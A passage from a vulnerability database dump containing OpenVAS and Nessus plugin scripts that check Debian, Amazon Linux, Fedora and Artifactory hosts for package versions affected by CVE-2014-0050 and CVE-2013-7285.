tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb6u2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb6u2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-03-17T23:01:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120359", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120359", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2014-312)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120359\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:24:34 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2014-312)\");\n script_tag(name:\"insight\", value:\"MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions.\");\n script_tag(name:\"solution\", value:\"Run yum update tomcat7 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-312.html\");\n script_cve_id(\"CVE-2014-0050\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-docs-webapp\", rpm:\"tomcat7-docs-webapp~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7\", rpm:\"tomcat7~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-lib\", rpm:\"tomcat7-lib~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-webapps\", rpm:\"tomcat7-webapps~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-el-2.2-api\", rpm:\"tomcat7-el-2.2-api~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-javadoc\", rpm:\"tomcat7-javadoc~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-jsp-2.2-api\", rpm:\"tomcat7-jsp-2.2-api~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-admin-webapps\", rpm:\"tomcat7-admin-webapps~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-servlet-3.0-api\", rpm:\"tomcat7-servlet-3.0-api~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7\", rpm:\"tomcat7~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "description": "This host is running Apache Tomcat and is prone to denial of service\n vulnerability.", "modified": "2019-05-10T00:00:00", "published": "2014-03-24T00:00:00", "id": "OPENVAS:1361412562310804251", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804251", "type": "openvas", "title": "Apache Tomcat Content-Type Header Denial Of Service Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_tomcat_content_type_hdr_dos_vuln.nasl 35236 2014-03-24 15:09:34Z mar$\n#\n# Apache Tomcat Content-Type Header Denial Of Service Vulnerability\n#\n# Authors:\n# Shashi Kiran N <nskiran@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:tomcat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804251\");\n script_version(\"2019-05-10T11:41:35+0000\");\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-10 11:41:35 +0000 (Fri, 10 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-03-24 15:09:34 +0530 (Mon, 24 Mar 2014)\");\n script_name(\"Apache Tomcat Content-Type Header Denial Of Service Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_apache_tomcat_consolidation.nasl\");\n script_mandatory_keys(\"apache/tomcat/detected\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/56830\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/90987\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/31615\");\n script_xref(name:\"URL\", value:\"http://blog.spiderlabs.com/2014/02/cve-2014-0050-exploit-with-boundaries-loops-without-boundaries.html\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Tomcat and is prone to denial of service\n vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an improper handling of Content-Type HTTP header for\n multipart requests\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to cause denial of\n service condition.\");\n\n script_tag(name:\"affected\", value:\"Apache Tomcat version 7.0.x before 7.0.51 and 8.0.0 before 8.0.2\");\n\n script_tag(name:\"solution\", value:\"Upgrade to 7.0.51, 8.0.2 or later.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( isnull( port = get_app_port( cpe:CPE ) ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe:CPE, port:port, exit_no_version:TRUE ) )\n exit( 0 );\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif( version_in_range( version:vers, test_version:\"7.0.0\", test_version2:\"7.0.50\" ) ||\n version_in_range( version:vers, test_version:\"8.0.0.RC1\", test_version2:\"8.0.1\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"7.0.51/8.0.2\", install_path:path );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-02-20T00:00:00", "id": "OPENVAS:1361412562310867519", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867519", "type": "openvas", "title": "Fedora Update for apache-commons-fileupload FEDORA-2014-2183", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for apache-commons-fileupload FEDORA-2014-2183\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867519\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-20 15:05:45 +0530 (Thu, 20 Feb 2014)\");\n script_cve_id(\"CVE-2014-0050\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for apache-commons-fileupload FEDORA-2014-2183\");\n script_tag(name:\"affected\", value:\"apache-commons-fileupload on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-2183\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128505.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apache-commons-fileupload'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-commons-fileupload\", rpm:\"apache-commons-fileupload~1.3~5.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-12T10:12:32", "description": "This update fixes remote code execution security vulnerability by\napplying backported upstream patch.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-02-23T00:00:00", "title": "Fedora 19 : xstream-1.3.1-5.1.fc19 (2014-2340)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-7285"], "modified": "2014-02-23T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:19", "p-cpe:/a:fedoraproject:fedora:xstream"], "id": "FEDORA_2014-2340.NASL", "href": "https://www.tenable.com/plugins/nessus/72629", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-2340.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72629);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-7285\");\n script_bugtraq_id(64760);\n script_xref(name:\"FEDORA\", value:\"2014-2340\");\n\n script_name(english:\"Fedora 19 : xstream-1.3.1-5.1.fc19 (2014-2340)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes remote code execution security vulnerability by\napplying backported upstream patch.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1051277\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128864.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?64b83dc9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xstream package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:X/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xstream\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"xstream-1.3.1-5.1.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xstream\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:12:32", "description": "This update fixes remote code execution security vulnerability by\napplying backported upstream patch.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-02-23T00:00:00", "title": "Fedora 20 : xstream-1.3.1-9.fc20 (2014-2372)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-7285"], "modified": "2014-02-23T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:xstream", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-2372.NASL", "href": "https://www.tenable.com/plugins/nessus/72630", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-2372.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72630);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-7285\");\n script_bugtraq_id(64760);\n script_xref(name:\"FEDORA\", value:\"2014-2372\");\n\n script_name(english:\"Fedora 20 : xstream-1.3.1-9.fc20 (2014-2372)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes remote code execution security vulnerability by\napplying backported upstream patch.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1051277\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128807.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?aaa83c1b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xstream package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:X/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xstream\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"xstream-1.3.1-9.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xstream\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T09:25:01", "description": "A version of Artifactory prior to 3.1.1.1 is hosted on the remote web\nserver. As such, it uses a library that has a known remote code\nexecution vulnerability.", "edition": 27, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-03-12T00:00:00", "title": "Artifactory < 3.1.1.1 XStream Remote Code Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-7285"], "modified": "2014-03-12T00:00:00", "cpe": ["cpe:/a:jfrog:artifactory"], "id": "ARTIFACTORY_3_1_1_1.NASL", "href": "https://www.tenable.com/plugins/nessus/72966", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72966);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-7285\");\n script_bugtraq_id(64760);\n\n script_name(english:\"Artifactory < 3.1.1.1 XStream Remote Code Execution\");\n script_summary(english:\"Checks version of Artifactory\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web application uses a library with a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A version of Artifactory prior to 3.1.1.1 is hosted on the remote web\nserver. As such, it uses a library that has a known remote code\nexecution vulnerability.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Artifactory 3.1.1.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-7285\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/12/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:jfrog:artifactory\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"artifactory_detect.nbin\");\n script_require_keys(\"www/Artifactory\");\n script_require_ports(\"Services/www\", 8081);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\napp = \"Artifactory\";\nfixed = \"3.1.1.1\";\n\nport = get_http_port(default:8081);\n\ninstall = get_install_from_kb(appname:app, port:port, exit_on_fail:TRUE);\n\nversion = install[\"ver\"];\npath = install[\"dir\"];\n\nif (ver_compare(ver:version, fix:fixed, strict:FALSE) >= 0)\n audit(AUDIT_WEB_APP_NOT_AFFECTED, app, path, version);\n\nif (report_verbosity > 0)\n{\n report =\n '\\n URL : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed +\n '\\n';\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T11:05:31", "description": "The remote host is affected by the vulnerability described in GLSA-201612-35\n(XStream: Remote execution of arbitrary code)\n\n It was found that XStream would deserialize arbitrary user-supplied XML\n content, thus representing objects of any type.\n 